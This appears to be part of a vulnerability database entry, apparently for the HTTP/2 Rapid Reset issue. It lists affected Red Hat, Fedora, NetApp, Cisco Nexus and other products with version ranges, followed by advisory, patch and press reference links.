
Redhat>>Jboss_fuse >> Version 7.0.0

Redhat>>Logging_subsystem_for_red_hat_openshift >> Version -

Redhat>>Machine_deletion_remediation_operator >> Version -

Redhat>>Migration_toolkit_for_applications >> Version 6.0

Redhat>>Migration_toolkit_for_containers >> Version -

Redhat>>Migration_toolkit_for_virtualization >> Version -

Redhat>>Network_observability_operator >> Version -

Redhat>>Node_healthcheck_operator >> Version -

Redhat>>Node_maintenance_operator >> Version -

Redhat>>Openshift >> Version -

Redhat>>Openshift_api_for_data_protection >> Version -

Redhat>>Openshift_container_platform >> Version 4.0

Redhat>>Openshift_container_platform_assisted_installer >> Version -

Redhat>>Openshift_data_science >> Version -

Redhat>>Openshift_dev_spaces >> Version -

Redhat>>Openshift_developer_tools_and_services >> Version -

Redhat>>Openshift_distributed_tracing >> Version -

Redhat>>Openshift_gitops >> Version -

Redhat>>Openshift_pipelines >> Version -

Redhat>>Openshift_sandboxed_containers >> Version -

Redhat>>Openshift_secondary_scheduler_operator >> Version -

Redhat>>Openshift_serverless >> Version -

Redhat>>Openshift_service_mesh >> Version 2.0

Redhat>>Openshift_virtualization >> Version 4

Redhat>>Openstack_platform >> Version 16.1

Redhat>>Openstack_platform >> Version 16.2

Redhat>>Openstack_platform >> Version 17.1

Redhat>>Process_automation >> Version 7.0

Redhat>>Quay >> Version 3.0.0

Redhat>>Run_once_duration_override_operator >> Version -

Redhat>>Satellite >> Version 6.0

Redhat>>Self_node_remediation_operator >> Version -

Redhat>>Service_interconnect >> Version 1.0

Redhat>>Single_sign-on >> Version 7.0

Redhat>>Support_for_spring_boot >> Version -

Redhat>>Web_terminal >> Version -

Redhat>>Enterprise_linux >> Version 6.0

Redhat>>Enterprise_linux >> Version 8.0

Redhat>>Enterprise_linux >> Version 9.0

Configuraton 0

Redhat>>Service_telemetry_framework >> Version 1.5

Redhat>>Enterprise_linux >> Version 8.0

Configuraton 0

Fedoraproject>>Fedora >> Version 37

Fedoraproject>>Fedora >> Version 38

Configuraton 0

Netapp>>Astra_control_center >> Version -

Netapp>>Oncommand_insight >> Version -

Configuraton 0

Akka>>Http_server >> Version To (excluding) 10.5.3

Configuraton 0

Konghq>>Kong_gateway >> Version To (excluding) 3.4.2

Configuraton 0

Jenkins>>Jenkins >> Version To (including) 2.414.2

Jenkins>>Jenkins >> Version To (including) 2.427

Configuraton 0

Apache>>Solr >> Version To (excluding) 9.4.0

Configuraton 0

Openresty>>Openresty >> Version To (excluding) 1.21.4.3

Configuraton 0

Cisco>>Business_process_automation >> Version To (excluding) 3.2.003.009

Cisco>>Connected_mobile_experiences >> Version To (excluding) 11.1

Cisco>>Crosswork_data_gateway >> Version To (excluding) 4.1.3

Cisco>>Crosswork_data_gateway >> Version From (including) 5.0.0 To (excluding) 5.0.2

Cisco>>Crosswork_situation_manager >> Version -

Cisco>>Crosswork_zero_touch_provisioning >> Version To (excluding) 6.0.0

Cisco>>Data_center_network_manager >> Version -

Cisco>>Enterprise_chat_and_email >> Version -

Cisco>>Expressway >> Version To (excluding) x14.3.3

Cisco>>Firepower_threat_defense >> Version To (excluding) 7.4.2

Cisco>>Iot_field_network_director >> Version To (excluding) 4.11.0

Cisco>>Prime_access_registrar >> Version To (excluding) 9.3.3

Cisco>>Prime_cable_provisioning >> Version To (excluding) 7.2.1

    Cisco>>Prime_infrastructure >> Version To (excluding) 3.10.4

    Cisco>>Prime_network_registrar >> Version To (excluding) 11.2

    Cisco>>Secure_dynamic_attributes_connector >> Version To (excluding) 2.2.0

      Cisco>>Secure_malware_analytics >> Version To (excluding) 2.19.2

        Cisco>>Telepresence_video_communication_server >> Version To (excluding) x14.3.3

        Cisco>>Ultra_cloud_core_-_policy_control_function >> Version To (excluding) 2024.01.0

          Cisco>>Ultra_cloud_core_-_policy_control_function >> Version 2024.01.0

          Cisco>>Ultra_cloud_core_-_serving_gateway_function >> Version To (excluding) 2024.02.0

            Cisco>>Ultra_cloud_core_-_session_management_function >> Version To (excluding) 2024.02.0

              Cisco>>Unified_attendant_console_advanced >> Version -

              Cisco>>Unified_contact_center_domain_manager >> Version -

              Cisco>>Unified_contact_center_enterprise >> Version -

              Cisco>>Unified_contact_center_enterprise_-_live_data_server >> Version To (excluding) 12.6.2

                Cisco>>Unified_contact_center_management_portal >> Version -

                Cisco>>Fog_director >> Version To (excluding) 1.22

                  Cisco>>Ios_xe >> Version To (excluding) 17.15.1

                  Cisco>>Ios_xr >> Version To (excluding) 7.11.2

                  Configuraton 0

                  Cisco>>Secure_web_appliance_firmware >> Version To (excluding) 15.1.0

                    Cisco>>Secure_web_appliance >> Version -

                    Configuraton 0

                    Cisco>>Nx-os >> Version To (excluding) 10.2\(7\)

                    Cisco>>Nx-os >> Version From (including) 10.3\(1\) To (excluding) 10.3\(5\)

                    Cisco>>Nx-os >> Version From (including) 10.4\(1\) To (excluding) 10.4\(2\)

                    Cisco>>Nexus_3016 >> Version -

                    Cisco>>Nexus_3016q >> Version -

                    Cisco>>Nexus_3048 >> Version -

                    Cisco>>Nexus_3064 >> Version -

                    Cisco>>Nexus_3064-32t >> Version -

                    Cisco>>Nexus_3064-t >> Version -

                    Cisco>>Nexus_3064-x >> Version -

                    Cisco>>Nexus_3064t >> Version -

                    Cisco>>Nexus_3064x >> Version -

                    Cisco>>Nexus_3100 >> Version -

                    Cisco>>Nexus_3100-v >> Version -

                    Cisco>>Nexus_3100-z >> Version -

                    Cisco>>Nexus_3100v >> Version -

                    Cisco>>Nexus_31108pc-v >> Version -

                    Cisco>>Nexus_31108pv-v >> Version -

                    Cisco>>Nexus_31108tc-v >> Version -

                    Cisco>>Nexus_31128pq >> Version -

                    Cisco>>Nexus_3132c-z >> Version -

                    Cisco>>Nexus_3132q >> Version -

                    Cisco>>Nexus_3132q-v >> Version -

                    Cisco>>Nexus_3132q-x >> Version -

                    Cisco>>Nexus_3132q-x\/3132q-xl >> Version -

                    Cisco>>Nexus_3132q-xl >> Version -

                    Cisco>>Nexus_3164q >> Version -

                    Cisco>>Nexus_3172 >> Version -

                    Cisco>>Nexus_3172pq >> Version -

                    Cisco>>Nexus_3172pq-xl >> Version -

                    Cisco>>Nexus_3172pq\/pq-xl >> Version -

                    Cisco>>Nexus_3172tq >> Version -

                    Cisco>>Nexus_3172tq-32t >> Version -

                    Cisco>>Nexus_3172tq-xl >> Version -

                    Cisco>>Nexus_3200 >> Version -

                    Cisco>>Nexus_3232 >> Version -

                    Cisco>>Nexus_3232c >> Version -

                    Cisco>>Nexus_3232c_ >> Version -

                    Cisco>>Nexus_3264c-e >> Version -

                    Cisco>>Nexus_3264q >> Version -

                    Cisco>>Nexus_3400 >> Version -

                    Cisco>>Nexus_3408-s >> Version -

                    Cisco>>Nexus_34180yc >> Version -

                    Cisco>>Nexus_34200yc-sm >> Version -

                    Cisco>>Nexus_3432d-s >> Version -

                    Cisco>>Nexus_3464c >> Version -

                    Cisco>>Nexus_3500 >> Version -

                    Cisco>>Nexus_3524 >> Version -

                    Cisco>>Nexus_3524-x >> Version -

                    Cisco>>Nexus_3524-x\/xl >> Version -

                    Cisco>>Nexus_3524-xl >> Version -

                    Cisco>>Nexus_3548 >> Version -

                    Cisco>>Nexus_3548-x >> Version -

                    Cisco>>Nexus_3548-x\/xl >> Version -

                    Cisco>>Nexus_3548-xl >> Version -

                    Cisco>>Nexus_3600 >> Version -

                    Cisco>>Nexus_36180yc-r >> Version -

                    Cisco>>Nexus_3636c-r >> Version -

                    Configuraton 0

                    Cisco>>Nx-os >> Version To (excluding) 10.2\(7\)

                    Cisco>>Nx-os >> Version From (including) 10.3\(1\) To (excluding) 10.3\(5\)

                    Cisco>>Nx-os >> Version From (including) 10.4\(1\) To (excluding) 10.4\(2\)

                    Cisco>>Nexus_9000v >> Version -

                    Cisco>>Nexus_9200 >> Version -

                    Cisco>>Nexus_9200yc >> Version -

                    Cisco>>Nexus_92160yc-x >> Version -

                    Cisco>>Nexus_92160yc_switch >> Version -

                    Cisco>>Nexus_9221c >> Version -

                    Cisco>>Nexus_92300yc >> Version -

                    Cisco>>Nexus_92300yc_switch >> Version -

                    Cisco>>Nexus_92304qc >> Version -

                    Cisco>>Nexus_92304qc_switch >> Version -

                    Cisco>>Nexus_9232e >> Version -

                    Cisco>>Nexus_92348gc-x >> Version -

                    Cisco>>Nexus_9236c >> Version -

                    Cisco>>Nexus_9236c_switch >> Version -

                    Cisco>>Nexus_9272q >> Version -

                    Cisco>>Nexus_9272q_switch >> Version -

                    Cisco>>Nexus_9300 >> Version -

                    Cisco>>Nexus_93108tc-ex >> Version -

                    Cisco>>Nexus_93108tc-ex-24 >> Version -

                    Cisco>>Nexus_93108tc-ex_switch >> Version -

                    Cisco>>Nexus_93108tc-fx >> Version -

                    Cisco>>Nexus_93108tc-fx-24 >> Version -

                    Cisco>>Nexus_93108tc-fx3h >> Version -

                    Cisco>>Nexus_93108tc-fx3p >> Version -

                    Cisco>>Nexus_93120tx >> Version -

                    Cisco>>Nexus_93120tx_switch >> Version -

                    Cisco>>Nexus_93128 >> Version -

                    Cisco>>Nexus_93128tx >> Version -

                    Cisco>>Nexus_93128tx_switch >> Version -

                    Cisco>>Nexus_9316d-gx >> Version -

                    Cisco>>Nexus_93180lc-ex >> Version -

                    Cisco>>Nexus_93180lc-ex_switch >> Version -

                    Cisco>>Nexus_93180tc-ex >> Version -

                    Cisco>>Nexus_93180yc-ex >> Version -

                    Cisco>>Nexus_93180yc-ex-24 >> Version -

                    Cisco>>Nexus_93180yc-ex_switch >> Version -

                    Cisco>>Nexus_93180yc-fx >> Version -

                    Cisco>>Nexus_93180yc-fx-24 >> Version -

                    Cisco>>Nexus_93180yc-fx3 >> Version -

                    Cisco>>Nexus_93180yc-fx3h >> Version -

                    Cisco>>Nexus_93180yc-fx3s >> Version -

                    Cisco>>Nexus_93216tc-fx2 >> Version -

                    Cisco>>Nexus_93240tc-fx2 >> Version -

                    Cisco>>Nexus_93240yc-fx2 >> Version -

                    Cisco>>Nexus_9332c >> Version -

                    Cisco>>Nexus_9332d-gx2b >> Version -

                    Cisco>>Nexus_9332d-h2r >> Version -

                    Cisco>>Nexus_9332pq >> Version -

                    Cisco>>Nexus_9332pq_switch >> Version -

                    Cisco>>Nexus_93360yc-fx2 >> Version -

                    Cisco>>Nexus_9336c-fx2 >> Version -

                    Cisco>>Nexus_9336c-fx2-e >> Version -

                    Cisco>>Nexus_9336pq >> Version -

                    Cisco>>Nexus_9336pq_aci >> Version -

                    Cisco>>Nexus_9336pq_aci_spine >> Version -

                    Cisco>>Nexus_9336pq_aci_spine_switch >> Version -

                    Cisco>>Nexus_9348d-gx2a >> Version -

                    Cisco>>Nexus_9348gc-fx3 >> Version -

                    Cisco>>Nexus_9348gc-fxp >> Version -

                    Cisco>>Nexus_93600cd-gx >> Version -

                    Cisco>>Nexus_9364c >> Version -

                    Cisco>>Nexus_9364c-gx >> Version -

                    Cisco>>Nexus_9364d-gx2a >> Version -

                    Cisco>>Nexus_9372px >> Version -

                    Cisco>>Nexus_9372px-e >> Version -

                    Cisco>>Nexus_9372px-e_switch >> Version -

                    Cisco>>Nexus_9372px_switch >> Version -

                    Cisco>>Nexus_9372tx >> Version -

                    Cisco>>Nexus_9372tx-e >> Version -

                    Cisco>>Nexus_9372tx-e_switch >> Version -

                    Cisco>>Nexus_9372tx_switch >> Version -

                    Cisco>>Nexus_9396px >> Version -

                    Cisco>>Nexus_9396px_switch >> Version -

                    Cisco>>Nexus_9396tx >> Version -

                    Cisco>>Nexus_9396tx_switch >> Version -

                    Cisco>>Nexus_9408 >> Version -

                    Cisco>>Nexus_9432pq >> Version -

                    Cisco>>Nexus_9500 >> Version -

                    Cisco>>Nexus_9500_16-slot >> Version -

                    Cisco>>Nexus_9500_4-slot >> Version -

                    Cisco>>Nexus_9500_8-slot >> Version -

                    Cisco>>Nexus_9500_supervisor_a >> Version -

                    Cisco>>Nexus_9500_supervisor_a\+ >> Version -

                    Cisco>>Nexus_9500_supervisor_b >> Version -

                    Cisco>>Nexus_9500_supervisor_b\+ >> Version -

                    Cisco>>Nexus_9500r >> Version -

                    Cisco>>Nexus_9504 >> Version -

                    Cisco>>Nexus_9504_switch >> Version -

                    Cisco>>Nexus_9508 >> Version -

                    Cisco>>Nexus_9508_switch >> Version -

                    Cisco>>Nexus_9516 >> Version -

                    Cisco>>Nexus_9516_switch >> Version -

                    Cisco>>Nexus_9536pq >> Version -

                    Cisco>>Nexus_9636pq >> Version -

                    Cisco>>Nexus_9716d-gx >> Version -

                    Cisco>>Nexus_9736pq >> Version -

                    Cisco>>Nexus_9800 >> Version -

                    Cisco>>Nexus_9804 >> Version -

                    Cisco>>Nexus_9808 >> Version -

                    References

                    https://news.ycombinator.com/item?id=37830998
                    Tags : Issue Tracking, Press/Media Coverage
                    https://github.com/caddyserver/caddy/issues/5877
                    Tags : Issue Tracking, Vendor Advisory
                    https://github.com/grpc/grpc-go/pull/6703
                    Tags : Issue Tracking, Patch
                    https://bugzilla.proxmox.com/show_bug.cgi?id=4988
                    Tags : Issue Tracking, Third Party Advisory
                    https://groups.google.com/g/golang-announce/c/iNNxDTCjZvo
                    Tags : Mailing List, Release Notes, Vendor Advisory
                    https://github.com/micrictor/http2-rst-stream
                    Tags : Exploit, Third Party Advisory
                    https://github.com/h2o/h2o/pull/3291
                    Tags : Issue Tracking, Patch
                    https://github.com/dotnet/announcements/issues/277
                    Tags : Issue Tracking, Mitigation, Vendor Advisory
                    https://github.com/advisories/GHSA-vx74-f528-fxqg
                    Tags : Mitigation, Patch, Vendor Advisory
                    https://www.openwall.com/lists/oss-security/2023/10/10/6
                    Tags : Mailing List, Third Party Advisory
                    https://netty.io/news/2023/10/10/4-1-100-Final.html
                    Tags : Release Notes, Vendor Advisory
                    https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday/
                    Tags : Press/Media Coverage, Third Party Advisory
                    https://bugzilla.suse.com/show_bug.cgi?id=1216123
                    Tags : Issue Tracking, Vendor Advisory
                    https://bugzilla.redhat.com/show_bug.cgi?id=2242803
                    Tags : Issue Tracking, Vendor Advisory
                    https://github.com/line/armeria/pull/5232
                    Tags : Issue Tracking, Patch
                    https://github.com/caddyserver/caddy/releases/tag/v2.7.5
                    Tags : Release Notes, Third Party Advisory